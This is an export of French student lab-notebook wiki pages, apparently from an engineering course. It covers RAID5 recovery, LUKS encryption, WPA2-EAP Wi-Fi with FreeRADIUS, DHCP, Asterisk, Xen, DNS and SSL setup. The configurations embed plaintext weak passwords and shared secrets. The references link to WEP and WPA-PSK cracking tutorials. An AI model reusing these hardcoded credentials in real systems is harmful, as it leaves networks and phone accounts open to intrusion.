La partition est bien supprimée:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remet la partition:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --add /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On peut ensuite constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===&amp;gt;.................]  recovery = 18.2% (191112/1047552) finish=0.4min speed=31852K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [====&amp;gt;................]  recovery = 20.0% (210764/1047552) finish=0.4min speed=30109K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [====&amp;gt;................]  recovery = 21.8% (229836/1047552) finish=0.4min speed=32833K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.6% (626140/1047552) finish=0.2min speed=29816K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.3% (989688/1047552) finish=0.0min speed=30124K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# [  446.720069] md: md0: recovery done.&lt;br /&gt;
cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous vérifions grâce à Gparted que la carte SD fournie comporte une seule partition.&lt;br /&gt;
Une fois ce test passé, nous regardons grâce à dmesg où est localisé la carte SD :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# dmesg&lt;br /&gt;
[...]&lt;br /&gt;
[1126726.403767] mmcblk1: mmc1:59b4 NCard 14.7 GiB&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre carte SD se situe donc sur /dev/mmcblk1.&lt;br /&gt;
Nous faisons donc un chiffrage AES avec un hashage SHA256 de la carte SD :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons alors renseigner un mot de passe pour crypter la clef.&lt;br /&gt;
Ensuite, nous ouvrons la partition Luks, puis nous formatons la carte :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
root@zebrasoma:/# mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous montons la partition, puis créons un fichier sur la carte :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
root@zebrasoma:/# vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous démontons la carte SD et fermons la partition Luks :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# umount /mnt&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksClose crypt_sd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous essayons ensuite d'accéder à la carte SD. En renseignant un mauvais mot de passe, une erreur apparaît.&lt;br /&gt;
Cependant, une fois le bon mot de passe renseigné, tout re-devient possible.&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;br /&gt;
Tout d'abord, nous installons FreeRadius sur notre machine virtuelle.&amp;lt;br /&amp;gt;&lt;br /&gt;
Dans le fichier '''users''', nous renseignons le login et le mot de passe pour se connecter à la borne Wifi : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
GreenArrow Cleartext-Password:=&amp;quot;glopglop&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Dans le fichier '''clients.conf''', nous ajoutons la configuration de la borne E306 et E304 :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
client E306 {&lt;br /&gt;
	ipaddr		= 10.60.1.2&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&lt;br /&gt;
client E304 {&lt;br /&gt;
	ipaddr		= 10.60.1.4&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on passe à la configuration de la borne Wifi. On se connecte en telnet via '''telnet 10.60.1.2''', puis nous rentrons en mode configuration : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aaa authentication login eap_greenarrow group radius_greenarrow&lt;br /&gt;
radius-server host 193.48.57.162 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
aaa group server radius radius_greenarrow&lt;br /&gt;
server 193.48.57.162 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
dot11 ssid SSID_GREENARROW&lt;br /&gt;
vlan 3&lt;br /&gt;
authentication open eap eap_greenarrow&lt;br /&gt;
authentication network-eap eap_greenarrow&lt;br /&gt;
authentication key-management wpa&lt;br /&gt;
mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption vlan 3 mode ciphers aes-ccm tkip&lt;br /&gt;
ssid SSID_GREENARROW&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.3&lt;br /&gt;
encapsulation dot1Q 3&lt;br /&gt;
no ip route-cache&lt;br /&gt;
bridge-group 3&lt;br /&gt;
bridge-group 3 subscriber-loop-control&lt;br /&gt;
bridge-group 3 spanning-disabled&lt;br /&gt;
bridge-group 3 block-unknown-source&lt;br /&gt;
no bridge-group 3 source-learning&lt;br /&gt;
no bridge-group 3 unicast-flooding &lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.3&lt;br /&gt;
encapsulation dot1Q 3&lt;br /&gt;
bridge-group 3&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois ces modifications effectuées, nous configurons l'interface wlan0 de l'eeePC pour pouvoir se connecter au Wifi à l'aide de '''ifup wlan0''' : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
  address 10.60.3.2&lt;br /&gt;
  netmask 255.255.255.0&lt;br /&gt;
  gateway 10.60.3.1&lt;br /&gt;
  wpa-ssid SSID_GREENARROW&lt;br /&gt;
  wpa-key-mgmt WPA-EAP&lt;br /&gt;
  wpa-identity GreenArrow&lt;br /&gt;
  wpa-password glopglop&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On lance le serveur FreeRadius via freeradius -X (mode debug).&lt;br /&gt;
Sur smartphone, nous arrivons à détecter notre SSID (SSID_GREENARROW). Nous pouvons également ping notre eeePC depuis la machine virtuelle, tout comme nous arrivons à pinger des Vm d'autres groupes depuis notre eeePC.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/freeradius# ping 10.60.3.2&lt;br /&gt;
PING 10.60.3.2 (10.60.3.2) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 10.60.3.2: icmp_seq=1 ttl=255 time=1.30 ms&lt;br /&gt;
64 bytes from 10.60.3.2: icmp_seq=2 ttl=255 time=1.96 ms&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Serveur DCHP ====&lt;br /&gt;
&lt;br /&gt;
Pour cette partie, nous avons d'abord installer le paquet isc-dhcp-server.&lt;br /&gt;
Ensuite, nous avons modifier le fichier dhcpd.conf :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
option domain-name &amp;quot;jjlddelamuerto.space&amp;quot;;&lt;br /&gt;
option domain-name-servers 193.48.57.162;&lt;br /&gt;
&lt;br /&gt;
subnet 10.60.3.0 netmask 255.255.255.0 {&lt;br /&gt;
      range 10.60.3.10 10.60.3.40;&lt;br /&gt;
      option routers 10.60.3.1;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous modifions ensuite isc-dhcp-server pour rajouter l'interface wlan0 : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
INTERFACES=&amp;quot;wlan0&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous pouvons maintenant nous connecter sur le reseau Wifi via smartphone, le serveur DHCP fonctionne correctement.&lt;br /&gt;
[[Fichier:Connexioniphone.JPG|thumb|center|Connexion via smartphone]]&lt;br /&gt;
&lt;br /&gt;
==== Configuration et utilisation du PCBX ====&lt;br /&gt;
&lt;br /&gt;
Nous avons modifiés le fichier sip.conf :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;[general]&lt;br /&gt;
hasvoicemail=yes&lt;br /&gt;
hassip=yes&lt;br /&gt;
hasiax=yes&lt;br /&gt;
callwaiting=yes&lt;br /&gt;
threewaycalling=yes&lt;br /&gt;
callwaitingcallerid=yes&lt;br /&gt;
transfer=yes&lt;br /&gt;
canpark=yes&lt;br /&gt;
cancallforward=yes&lt;br /&gt;
callreturn=yes&lt;br /&gt;
callgroup=1&lt;br /&gt;
pickupgroup=1&lt;br /&gt;
nat=yes&lt;br /&gt;
&lt;br /&gt;
[6001]&lt;br /&gt;
type=friend&lt;br /&gt;
host=dynamic&lt;br /&gt;
dtmfmode=rfc2833&lt;br /&gt;
disallow=all&lt;br /&gt;
allow=ulaw&lt;br /&gt;
fullname=JulienJoignaux&lt;br /&gt;
username=jjoignaux&lt;br /&gt;
secret=secret&lt;br /&gt;
context=work&lt;br /&gt;
&lt;br /&gt;
[6002]&lt;br /&gt;
type=friend&lt;br /&gt;
host=dynamic&lt;br /&gt;
dtmfmode=rfc2833&lt;br /&gt;
disallow=all&lt;br /&gt;
allow=ulaw&lt;br /&gt;
fullname=LoicDelecroix&lt;br /&gt;
username=ldelecro&lt;br /&gt;
secret=secret&lt;br /&gt;
context=work&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis nous modifions le fichier extensions.conf&lt;br /&gt;
&amp;lt;pre&amp;gt;[work]&lt;br /&gt;
exten=&amp;gt;_6XXX,1,Dial(SIP/${EXTEN},20)&lt;br /&gt;
exten =&amp;gt; _6XXX,2,Hangup()&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:voipjjld.jpg|thumb|center|Appel entre 2 smartphones]]&lt;br /&gt;
&lt;br /&gt;
== Références ==&lt;br /&gt;
&lt;br /&gt;
* Crackage de la clef WEP : [http://wiki.backtrack-fr.net/index.php/Casser_une_cl%C3%A9_wep/wpa_avec_la_suite_Aircrack-ng]&lt;br /&gt;
* Cassage de mot de passe WPA-PSK : [http://www.crack-wifi.com/tutoriel-crack-wpa.php]&lt;br /&gt;
* Cryptage de données : [https://doc.ubuntu-fr.org/cryptsetup]&lt;br /&gt;
* DHCP : [https://doc.ubuntu-fr.org/isc-dhcp-server]&lt;br /&gt;
* Asterisk : [http://denisrosenkranz.com/tuto-installer-et-configurer-asterisk-sous-debian-6-et-ubuntu/]&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=46350</id>
		<title>Cahier 2016 groupe n°2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=46350"/>
				<updated>2017-11-17T13:55:37Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : Annulation des modifications 46349 de Hdelatte (discussion)&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Tâche particulière ==&lt;br /&gt;
&lt;br /&gt;
Câblage de la fibre: &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Prise de connaissance du sujet de PRA et le choix des tâches particulières. Nous avons également commencer à essayer d'identifier les câbles de fibres déjà existants.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Toujours sur la tâche particulière. Identification de tous les câbles déjà tirés. Test de link de chaque câble. Nous avons également commencé à passer les câbles restants.&lt;br /&gt;
Tous les câbles nécessaires ont été tirés entre les deux salles, tous les link sont up. Nous avons identifié chaque câble par un scotch de couleur différente. Nous avons également percé la gouttière de la E304 pour laisser passer un raccord de fibre proprement. &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Nous avons pu identifier les câbles déjà présents. Il y a donc 2 câbles déjà tirés entre les 2 piles, 2 câbles qui partent de la E306 jusqu'au boîtier ainsi qu'un câble par salle quid descend dans le local technique. &lt;br /&gt;
* Nous allons donc prolonger les 2 câbles s'arrêtant dans le boîtier et tirer 2 nouveaux câbles entre les deux piles: nous aurons donc 6 fils au total. &lt;br /&gt;
* 2 Grands câbles de 30m ~ -&amp;gt; Estimation de 26m entre les 2 piles.&lt;br /&gt;
* 2 petits câbles de 15m ~ -&amp;gt; Estimation de 13m du boîtier à la pile&lt;br /&gt;
* Retirer le câble ethernet qui était tiré entre les 2 piles.&lt;br /&gt;
* 7 heures passées au total sur la tâche particulière&lt;br /&gt;
[[Fichier:im1.JPG|300px|thumb|left|Fibre passant entre les 2 salles]]&lt;br /&gt;
[[Fichier:im2.JPG|300px|thumb|right|Câbles dans le faux plafond]]&lt;br /&gt;
[[Fichier:im4.JPG|300px|thumb|left|Guide câbles pour le faux plafond]]&lt;br /&gt;
[[Fichier:im5.JPG|300px|thumb|right|Boîtiers contenant les raccords de fibres]]&lt;br /&gt;
[[Fichier:im6.JPG|300px|thumb|left|Les fibres en E304 disponibles]]&lt;br /&gt;
[[Fichier:im7.JPG|300px|thumb|right|Trou dans le cache laissant passer la fibre]] &amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Travail commun ==&lt;br /&gt;
&lt;br /&gt;
* Installation de la machine virtuelle XEN&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=GreenArrow --ip=193.48.57.162 --netmask=255.255.255.240 --gateway=193.48.57.172&lt;br /&gt;
  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Modification du fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
lvcreate -L 10G -n /dev/virtual/ima5-GreenArrow-home -v&lt;br /&gt;
lvcreate -L 10G -n /dev/virtual/ima5-GreenArrow-var -v&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/GreenArrow/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/GreenArrow/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/ima5-GreenArrow-home,xvdc,w',&lt;br /&gt;
                  'phy:/dev/virtual/ima5-GreenArrow-var,xvdb,w',&lt;br /&gt;
              ]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Commandes de base pour démarrer la VM proprement:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
xl create /etc/xen/GreenArrow.cfg&lt;br /&gt;
ssh username@weppes&lt;br /&gt;
ssh root@193.48.57.162&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Achat du nom de domaine [http://jjlddelamuerto.space] sur Gandi pour 1.19€ TTC&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle nous avons configuré le fichier sshd_config (changement de la ligne PubkeyAuthentication) :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
RSAAuthentication yes&lt;br /&gt;
PubkeyAuthentication yes&lt;br /&gt;
#AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:~# service ssh restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite réussi à nous connecter en SSH sur notre VM:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
jjoignau@weppes:~$ ssh root@193.48.57.162&lt;br /&gt;
root@193.48.57.162's password: &lt;br /&gt;
&lt;br /&gt;
The programs included with the Debian GNU/Linux system are free software;&lt;br /&gt;
the exact distribution terms for each program are described in the&lt;br /&gt;
individual files in /usr/share/doc/*/copyright.&lt;br /&gt;
&lt;br /&gt;
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent&lt;br /&gt;
permitted by applicable law.&lt;br /&gt;
Last login: Mon Nov  7 10:06:49 2016&lt;br /&gt;
root@GreenArrow:~# exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous modifions le fichier '''named.conf.local''' pour créer les zones nécessaires :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;jjlddelamuerto.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.jjlddelamuerto.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.57.48.193.in-addr.arpa&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les fichiers '''db.jjlddelamuerto.space''' et '''db.57.48.193.in-addr.arpa''' :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@       IN      NS      ns.jjlddelamuerto.space. &lt;br /&gt;
@       IN      NS      ns6.gandi.net.&lt;br /&gt;
ns      IN      A       193.48.57.162&lt;br /&gt;
www     IN      A       193.48.57.162&lt;br /&gt;
@       IN      A       193.48.57.162&lt;br /&gt;
ns      IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
www     IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
@       IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                        2016113007      ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns.jjlddelamuerto.space.&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns2.gandi.net.&lt;br /&gt;
&lt;br /&gt;
162                             IN      PTR     jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous modifions ensuite le fichier /etc/resolv.conf afin de passer par notre serveur :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
search jjlddelamuerto.space&lt;br /&gt;
nameserver 193.48.57.162&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous vérifions notre configuration :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# host www.jjlddelamuerto.space&lt;br /&gt;
www.jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
www.jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/bind# host -tany jjlddelamuerto.space&lt;br /&gt;
jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
jjlddelamuerto.space has SOA record ns.jjlddelamuerto.space. root.jjlddelamuerto.space. 2016113007 604800 86400 2419200 604800&lt;br /&gt;
jjlddelamuerto.space name server ns6.gandi.net.&lt;br /&gt;
jjlddelamuerto.space name server ns.jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL.&lt;br /&gt;
Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout GreenArrow.key -out GreenArrow.csr&lt;br /&gt;
Generating a 2048 bit RSA private key&lt;br /&gt;
&lt;br /&gt;
If you enter '.', the field will be left blank.&lt;br /&gt;
-----&lt;br /&gt;
Country Name (2 letter code) [AU]:FR&lt;br /&gt;
State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:jjlddelamuerto.space&lt;br /&gt;
Email Address []:&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# ls&lt;br /&gt;
GreenArrow.csr	GreenArrow.key&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# cat GreenArrow.csr&lt;br /&gt;
&lt;br /&gt;
-----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# apt-get install postfix mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# cp certificat.crt /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
